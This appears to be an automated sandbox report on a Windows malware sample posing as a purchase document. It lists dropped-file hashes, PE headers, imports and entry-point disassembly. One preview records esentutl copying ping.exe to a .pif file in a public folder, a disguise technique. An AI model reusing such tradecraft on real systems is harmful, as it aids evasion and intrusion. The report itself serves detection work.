Encrypted:false
SSDEEP:24576:jJnJ5D3WYnsqjnhMgeiCl7G0nehbGZpbD:jJnJ5DGY7Dmg27RnWGj
MD5:ADFE5C8879C41AEA47D22E19AC1F0F44
SHA1:4AB4BEF3E8690CD76C88D06A8E99114345EFF57C
SHA-256:3C31EDE97ADF036031D98090691805FA8AEC574E7B2476C2AA441325A498FA8C
SHA-512:C4FCCC8CFAE7719CE183720B1350F50BB5BB142C610A26A45BA377632A603BA61B55D59EA0F6ECE6AE87E44E5BC03F2748238D6E150A3AAF6DAA4A96856C0D5A
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2075136
Entropy (8bit):6.7365572773665265
Encrypted:false
SSDEEP:49152:CPK86JYTerDjfJ2313e1mP1MdnUwDmg27RnWGj:7D527BWG
MD5:2959272C47E0CAE99787E5E0BDDA7B2A
SHA1:BD5B11609EB28C6F6E774DE8631EDC11342617D6
SHA-256:52FC2D76DC9E7986C5E4E0436F578B8A80916F351E4F28B921493CF7E497FEF7
SHA-512:DFA7103B24700BA9E736E16EB0B4B2434873853B2CA34EB421E5ADA8E35C115FD023C1455082F8B9301F1EF3789CAF229901B198D5C384A2D021EA5EF05E9CD3
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1225728
Entropy (8bit):5.163302245982073
Encrypted:false
SSDEEP:12288:AEP3R6TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:b6TsqjnhMgeiCl7G0nehbGZpbD
MD5:1F7F4AE415948A1027E513F2D23B8A5B
SHA1:9CE233EA690638F834ACB826D3D08DBE9D6DE1F1
SHA-256:B2F16B990F85848BE6ACCE5F914AEEB32C685CCD95B1B96316CAA07B68F3EAB1
SHA-512:50EB5E674B00A5346E22F10C193306252CB03E845D85101AD04533CF7D07FB9DBE5DC2868EDC8C455B353B20D9F09D65C1098C76ED87E6E28FF86C77DE087EDD
Malicious:true
Reputation:unknown

Process: C:\Windows\System32\alg.exe
File Type: data
Category: dropped
Size (bytes): 12320
Entropy (8bit): 7.98670153326725
Encrypted: false
SSDEEP: 384:c6az65qqdB8adqLUo4Tj8aGpxXAs2Oml/a0W/ay8Ntq51:ac5LdqZ4Tj8aGD2hl/aF/N881
MD5: 490D543F1BC925B48C1DD2E5525DB0FE
SHA1: AD0951A328B3796B04608A09954314243E7388A6
SHA-256: D429F1D9498B3D4E73D41219EFB065F910A5C82396A50E88195F7589220F9200
SHA-512: 9E86ED198262E9C738AEFB4DC09B23585C992D69AF6EBA6841B4E9CE0086AD43599CBBAD3E7A9FDDCA63733DB7EC08A0EBEC34F38892655D78478A1352854850
Malicious: false
Reputation: unknown

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1278464
Entropy (8bit): 5.142977586782422
Encrypted: false
SSDEEP: 12288:ajkyoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:aIyosqjnhMgeiCl7G0nehbGZpbD
MD5: 7AE7553BA674284A076D19A633F7EFF0
SHA1: 1575FD05F276CF7DB410BA80BAFC5CA1963373CA
SHA-256: 3237C3D4C11470E4660ADD504B31ACF71F7C5A2E9A9F2163BDB7BFC999E3BE3E
SHA-512: 6C8D04B36B46883CD84DAFCD9A118015E30784B9E1A52BB875707389578C2DD20ED3103BD9AE1C44688B894027F15F728F57AFF8DA0A33A1E70997B347EDBEF9
Malicious: true
Reputation: unknown

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1199616
Entropy (8bit): 5.083881934987249
Encrypted: false
SSDEEP: 12288:D4DuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uusqjnhMgeiCl7G0nehbGZpbD
MD5: F80F4E42442149BE21C33A6CFB745A9B
SHA1: 56031F6B78EF37E74DD1A8ADADB40684B52F5E63
SHA-256: 616BBC2C07D1B4022B655007EE9FBAC46EC13E36A526BB406363381913206E61
SHA-512: F1AD8BB2F2215108CB5D6129928F2A424784B70649E8D9367151F535E351C5681CCE6EC13C12BC99393F96BDA0D8C1F4465D19B17BD81BFD2192982DE5985CF5
Malicious: true
Reputation: unknown

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1146880
Entropy (8bit): 5.0275745281626385
Encrypted: false
SSDEEP: 12288:G9KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cKsqjnhMgeiCl7G0nehbGZpbD
MD5: 9E84CEFC497519C8483A6623FAD6ED3D
SHA1: D4E217AF8B73C7673BCC9F548E55E9B06044CFDD
SHA-256: BF24E76F12FDD69ED7550A5A632E31B882EA335B77E534A125C78336FF3CC4C7
SHA-512: 20CEE389D607C89DCA6B90AF7134C818B5D2FC86E032B5B9B924CCF712BD4733324A69148257E8CB6BCD5CE49335F9D2EA9150E57952A90D756D44CE40BA1647
Malicious: true
Reputation: unknown

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1303552
Entropy (8bit): 7.17152935485563
Encrypted: false
SSDEEP: 24576:6Z0FxT1UoYr99GdcpKDsqjnhMgeiCl7G0nehbGZpbD:awWcHDmg27RnWGj
MD5: 680F459932662444F71FD678EBDF4171
SHA1: 546B290480A2DE723EC37C1E220E1DE78BF5FE10
SHA-256: FD894DE64E1F3B095C2598DEB789B174CBE575B1C17E455C9EC70153C37B7B37
SHA-512: 5145046CF1165B5573089BF3BBD6ECDAF977BF713BFD1DBB690A891226052C3B01FF33925A0E108766978CE452D45A582E0CD35A490755B3C0A0D13AB3A336B6
Malicious: true
Reputation: unknown

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1339392
Entropy (8bit): 5.269275998470314
Encrypted: false
SSDEEP: 12288:PyoKo2fRple9pAXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:PyocJApAsqjnhMgeiCl7G0nehbGZpbD
MD5: F0B46EB736FF9F031B20DBC806736CBC
SHA1: 87376D5AD65A70FC9855406402A04532D8E374E6
SHA-256: 7A617F7A95DB13876451136FBEF82A5867610129FBB97F5E190835CED651AD2A
SHA-512: 2B9D1F0867BCAD7363976C8FC1FA8D017D96E5D42165FF86B07171597A850AC940B2296B161C2B33FDE3537344412FE2D76B05F6E1FDE8C00FD2653D6099DD83
Malicious: true
Reputation: unknown

Process: C:\Users\Public\Libraries\ymafvvdS.pif
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2164736
Entropy (8bit): 7.062018620364253
Encrypted: false
SSDEEP: 49152:EWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIKQDmg27RnWGj:u0zuNIcD527BWG
MD5: 9BFD3EAD3D7CAB859F5ACBEE167740B3
SHA1: DEADA76D7E1BBA474CED79C65A97E96E4114D800
SHA-256: 7C36F8947992FE5AF578F47654410485005EBF46D41CD1710BB867BEAF13CDF3
SHA-512: E839A05C68C8C919062F6174B1CF7FF999B32C6A913891792CE7AAE1F54A9965BD38ACA2219C4068AA5368112FB5D715C61A45A75892D12E924C00CC6E532CED
Malicious: true
Reputation: unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09980532201271851
Encrypted:false
SSDEEP:6:svuSc63l/k/uMclF6vMclFq5zUbm1tNOn+SkUeYDwDzym0uScjj:svul6V/kqF69Fq5z9vO+pawHym0ulf
MD5:F597898498EEFC86B6B601492B4C8192
SHA1:96FB19E29F9D39B0ED2A64BCD1FC39E3F668912B
SHA-256:238ECDE4DF0A01293DA7472DEC3374EC3E1B6B4BD0B1D9B8C116AD27BCE12DDF
SHA-512:EBF5BC88520919DF4973C4DA71476CF088200BDD954AE22239FF471F793F62778DCF0018BCEF9D0137CC9CE9F38096B0B26E7BFC7587D3F36DA9FAE759CAE23F
Malicious:false
Reputation:unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.10132013151562051
Encrypted:false
SSDEEP:6:Vl6RC3l/k/uMclF6vMclFq5zU7NEtNMu3n+SkUeYDwDzyMhrb:Vl6RCV/kqF69Fq5zSEvX+pawHysf
MD5:FBDE7D1C96E11A8DB86D01102845F32A
SHA1:C3FE52AFB49BEF79EDEA0ED8E754A73C529D8681
SHA-256:435E93E841E468B91E5820000C4D84B710B4233CB76230E02A24C2DBE2AFE43E
SHA-512:B24E0C90D913C5BF7F5A61C15D3C32EED011AF60BC9D940B34D3EC809F4702131A07921AAC6C171963A08A29C98C9D6F0DEDF62E77B7D0351003C973225ECBEE
Malicious:false
Reputation:unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09837574328458057
Encrypted:false
SSDEEP:6:uV0JY3Nk/uMclF6vMclFq5zUR/tNIn+SkUeYDwDzy7JBr:uyJY9kqF69Fq5zK/vI+pawHy7Jl
MD5:56128C0E82F8FCED62D77713FA9F5BB3
SHA1:54F2ED41AB5BBE6829290962FB18EB09BFC7839C
SHA-256:4547A48C746412F69281732C1667266399E74C5D78CE0FE5DD66DDF82DDBC2E5
SHA-512:432F50A4DD4D49AC65A75BD476B6A21DF6059170CFDFD8018E632AC45F37CE7C2F85B65A05A7A8B27831E3AB32BBFA3B57F66AE3D1A850A205B8B7F02400FEA5
Malicious:false
Reputation:unknown
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:Microsoft HTML Help Project
Category:dropped
Size (bytes):869
Entropy (8bit):4.8858245776382505
Encrypted:false
SSDEEP:24:pXGEx9BHMlTDQ49+EHM2dGiRzu2DIJOlk3R6:5j7WTDCERD
MD5:EE98BC909AC68E27D8BF76D2E745D6B2
SHA1:DB3127D8E708C27327FE56707242E0545CCA78B2
SHA-256:78EC75C0FD5795639581FA9A2CB4DF5E4D50EA3FE77DFF590EA0FF1D38610218
SHA-512:BA606FFDEE32EC50E52E5E42BBC9F3EE2E846CA31A3E950F05B7C31941071C258F7EB01412D73FC0605265C32416A57B1593E8AFA41A94D6C323D53F51B16858
Malicious:false
Reputation:unknown
Preview:..Usage Error: Invalid argument 'REQUIRED'. Options must be preceded by '-' or '/'.....Extensible Storage Engine Utilities for Microsoft(R) Windows(R)..Version 10.0..Copyright (C) Microsoft Corporation. All Rights Reserved.....DESCRIPTION: Database utilities for the Extensible Storage Engine for Microsoft(R) Windows(R).....MODES OF OPERATION:.. Defragmentation: /d <database name> [options].. Recovery: /r <logfile base name> [options].. Integrity: /g <database name> [options].. Checksum: /k <file name> [options].. Repair: /p <database name> [options].. File Dump: /m[mode-modifier] <filename>.. Copy File: /y <source file> [options]....<<<<< Press a key for more help >>>>>..D=Defragmentation, R=Recovery, G=inteGrity, K=checKsum,..P=rePair, M=file duMp, Y=copY file..=>
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):561
Entropy (8bit):4.5384355284379145
Encrypted:false
SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNt:/p4xT5cp7u0wQakB4aV4t8N2
MD5:7E4D38978C26AF4C0157FD5D3C46280A
SHA1:545DE154C384AC385669E28B9099DB7B9AC35B3A
SHA-256:3E66CA31F5323DBEFB46A604620A3EA38767E31382DE36A42C2C1C7A38D5C1A8
SHA-512:FFAE5B123BFA65B070F8DD2EFA5F9996C8D7A416CEF54005AD00CFD90D2518B6FEB49C3843C93B48D9E9B53775CE31EC087970F85E4B0974EC37D9D5A0DE57D6
Malicious:false
Reputation:unknown
Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.157 seconds.....
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.9809492769682215
TrID:
• Win32 Executable (generic) a (10002005/4) 93.60%
• Win32 Executable Borland Delphi 7 (665061/41) 6.22%
• Windows Screen Saver (13104/52) 0.12%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
File name:PURCHASE REQUIRED DETAILS 000487958790903403.exe
File size:1'264'128 bytes
MD5:cbeea46a413d2f3d7166104d79788062
SHA1:6bca74ac8ef6b5a5377dbd0cac8ce783dda2b080
SHA256:5250d7820ffe465180b022c710bb170b02d1aeb8fbb4c530c5e039d4259009ef
SHA512:34d3cbbf686869bf5e0c69239f50ebe93d85feff13298afe14d6de6afae7112d3aa4ef64b14d7fe48768c740c635500d2180e709b57494f264853dafc5642b99
SSDEEP:24576:zPMPVEhH8frMNVO1wyWYVtcqqvHP7R3Eb1v7kcER8:zPUyOShq0HFA7zER8
TLSH:31459E36E3D2D531E39611340C3AE79C1429BE10DE94AC7ADBF938985F35EB0A62D172
File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash:58fad8c9c7c1c143
Entrypoint:0x487840
Entrypoint Section:.itext
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:527a63fb749f250b3291f735431fb926
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 004867D8h
call 00007FF864C38C69h
mov eax, dword ptr [0051B2ECh]
mov eax, dword ptr [eax]
call 00007FF864C940D1h
mov ecx, dword ptr [0051B200h]
mov eax, dword ptr [0051B2ECh]
mov eax, dword ptr [eax]
mov edx, dword ptr [0048290Ch]
call 00007FF864C940D1h
mov eax, dword ptr [0051B2ECh]
mov eax, dword ptr [eax]
call 00007FF864C94145h
call 00007FF864C36C00h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al   (repeated 64 times: the disassembler decoding the zero-byte padding that follows the entry-point stub)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x120000 | 0x2a1e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12e000 | 0xf200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x125000 | 0x88c8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x124000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1207cc | 0x68c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x85a20 | 0x85c00 | 32914a4ae2038f195450841770cfb2b5 | False | 0.5154661945093458 | data | 6.527570967979339 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x87000 | 0x888 | 0xa00 | ff65773b408a6dc6b42c471ec6f6063a | False | 0.539453125 | data | 5.685670077449999 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x88000 | 0x93498 | 0x93600 | c9befc6195b5e609db66a54f059536ca | False | 0.4011526585029686 | data | 6.496383668365439 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x11c000 | 0x3708 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x120000 | 0x2a1e | 0x2c00 | 87b19ddb7d0c017a45db353e65e9290d | False | 0.30619673295454547 | MIPSEB-LE MIPS-III ECOFF executable stripped - version 0.18 | 5.068542061868325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x123000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x124000 | 0x18 | 0x200 | 2f07acfeab4d52fe1003c0710394a5a6 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "R" | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x125000 | 0x88c8 | 0x8a00 | 762a2311f796f314f61681486f1d5d98 | False | 0.5990432518115942 | data | 6.657135448984252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x12e000 | 0xf200 | 0xf200 | 4ecb43381651e0db8543533c7e3680da | False | 0.3708354855371901 | data | 6.181511046885612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x12eb78 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x12ecac | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x12ede0 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x12ef14 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x12f048 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x12f17c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x12f2b0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x12f3e4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x12f5b4 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x12f798 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x12f968 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x12fb38 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x12fd08 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x12fed8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x1300a8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x130278 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x130448 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x130618 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x130700 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 15118 x 15118 px/m | | | 0.5735815602836879
RT_ICON | 0x130b68 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 15118 x 15118 px/m | | | 0.40081967213114755
RT_ICON | 0x1314f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15118 x 15118 px/m | | | 0.2732176360225141
RT_ICON | 0x132598 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 15118 x 15118 px/m | | | 0.1770746887966805
RT_ICON | 0x134b40 | 0x1c9f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9593285109867613
                                                                                                                                                                                                                        RT_DIALOG0x1367e00x52data0.7682926829268293
                                                                                                                                                                                                                        RT_DIALOG0x1368340x52data0.7560975609756098
                                                                                                                                                                                                                        RT_STRING0x1368880x380data0.3716517857142857
                                                                                                                                                                                                                        RT_STRING0x136c080x324data0.4564676616915423
                                                                                                                                                                                                                        RT_STRING0x136f2c0x9cdata0.717948717948718
                                                                                                                                                                                                                        RT_STRING0x136fc80xecdata0.6271186440677966
                                                                                                                                                                                                                        RT_STRING0x1370b40x1a4data0.5357142857142857
                                                                                                                                                                                                                        RT_STRING0x1372580x440data0.38235294117647056
                                                                                                                                                                                                                        RT_STRING0x1376980x39cdata0.38961038961038963
                                                                                                                                                                                                                        RT_STRING0x137a340x390data0.40789473684210525
                                                                                                                                                                                                                        RT_STRING0x137dc40x40cdata0.3783783783783784
                                                                                                                                                                                                                        RT_STRING0x1381d00x118data0.5214285714285715
                                                                                                                                                                                                                        RT_STRING0x1382e80xccdata0.6029411764705882
                                                                                                                                                                                                                        RT_STRING0x1383b40x208data0.5096153846153846
                                                                                                                                                                                                                        RT_STRING0x1385bc0x398data0.32608695652173914
                                                                                                                                                                                                                        RT_STRING0x1389540x38cdata0.3876651982378855
                                                                                                                                                                                                                        RT_STRING0x138ce00x294data0.42424242424242425
                                                                                                                                                                                                                        RT_RCDATA0x138f740x10data1.5
                                                                                                                                                                                                                        RT_RCDATA0x138f840x304data0.7007772020725389
                                                                                                                                                                                                                        RT_RCDATA0x1392880x3d9bDelphi compiled form 'TfmMain'0.29928349502250967
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d04c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d0880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_CURSOR0x13d09c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                        RT_GROUP_ICON0x13d0b00x4cdata0.8289473684210527
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
